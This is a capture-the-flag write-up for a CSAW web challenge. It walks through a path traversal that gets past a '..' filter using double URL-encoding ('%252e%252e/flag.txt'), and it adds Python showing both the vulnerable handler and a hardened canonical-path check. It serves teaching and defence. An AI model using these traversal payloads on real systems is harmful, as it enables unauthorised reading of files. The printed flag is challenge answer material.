Web 100 Orange v1 - By Iniesta

Host : http://web.chal.csaw.io:7311/?path=orange.txt

Problem :

Solution :

The URL of this site contains a parameter (path) which allows reading the different files stored on the site.

For example, ?path=orange.txt

allows us to access the contents of orange.txt ==> i love oranges

Try to pass an empty value:

http://web.chal.csaw.io:7311/?path=

We Get :

Now time to surf the paths. Try to go back by using ../

http://web.chal.csaw.io:7311/?path=../ ==> WHOA THATS BANNED!!!!

We have noticed that the two dots are banned, so let's try the hex (URL-encoded) form:

. => %2e
.. => %2e%2e

http://web.chal.csaw.io:7311/?path=%2e%2e/ ==> WHOA THATS BANNED!!!!

Still banned!

There is still something to try:

let's double-encode the hex form (the filter checks the once-decoded value, but the application decodes it a second time before opening the file)!

For that we can use this website to help us : https://meyerweb.com/eric/tools/dencoder/

http://web.chal.csaw.io:7311/?path=%252e%252e/ => Success ! :

It remains for us to read the file flag.txt:

http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt

Flag : flag{thank_you_based_orange_for_this_ctf_challenge}
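As an added example that is not part of the original writeup (the challenge source is not on this page, so the vulnerable handler below is a hypothetical model of the behaviour observed above: `..` banned, `%2e%2e` banned, `%252e%252e` allowed), here is why a substring check on the once-decoded parameter fails, and how checking the canonical path against the document root instead of searching for `..` closes the hole. `BASE_DIR` is an assumed document root.

```python
import os
from typing import Optional
from urllib.parse import unquote

BASE_DIR = "/srv/orange"  # assumed document root (hypothetical)


def naive_is_banned(path: str) -> bool:
    """Filter as the challenge appears to behave: reject '..' in the
    parameter after the web server's single URL-decode."""
    return ".." in path


def vulnerable_resolve(raw_param: str) -> Optional[str]:
    """Model of the vulnerable handler: the server decodes once, the filter
    runs, then the application decodes again before opening the file."""
    once = unquote(raw_param)      # %252e%252e/flag.txt -> %2e%2e/flag.txt
    if naive_is_banned(once):
        return None                # "WHOA THATS BANNED!!!!"
    twice = unquote(once)          # %2e%2e/flag.txt -> ../flag.txt
    return os.path.normpath(os.path.join(BASE_DIR, twice))


def hardened_resolve(raw_param: str) -> Optional[str]:
    """Decode until the value is stable (bounded), then compare the
    canonical path with BASE_DIR rather than looking for '..' in a string.
    On a real filesystem use os.path.realpath as well so symlinks cannot
    point outside the root."""
    decoded = raw_param
    for _ in range(3):             # bounded: stop once decoding no longer changes it
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    candidate = os.path.normpath(os.path.join(BASE_DIR, decoded))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None                # resolved outside the document root
    return candidate


if __name__ == "__main__":
    for p in ["orange.txt", "../flag.txt", "%2e%2e/flag.txt", "%252e%252e/flag.txt"]:
        print(f"{p:22} vulnerable={vulnerable_resolve(p)!s:22} hardened={hardened_resolve(p)}")
```

Only the double-encoded input slips past the naive filter; the canonical-path check rejects every traversal form regardless of how many times it was encoded.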
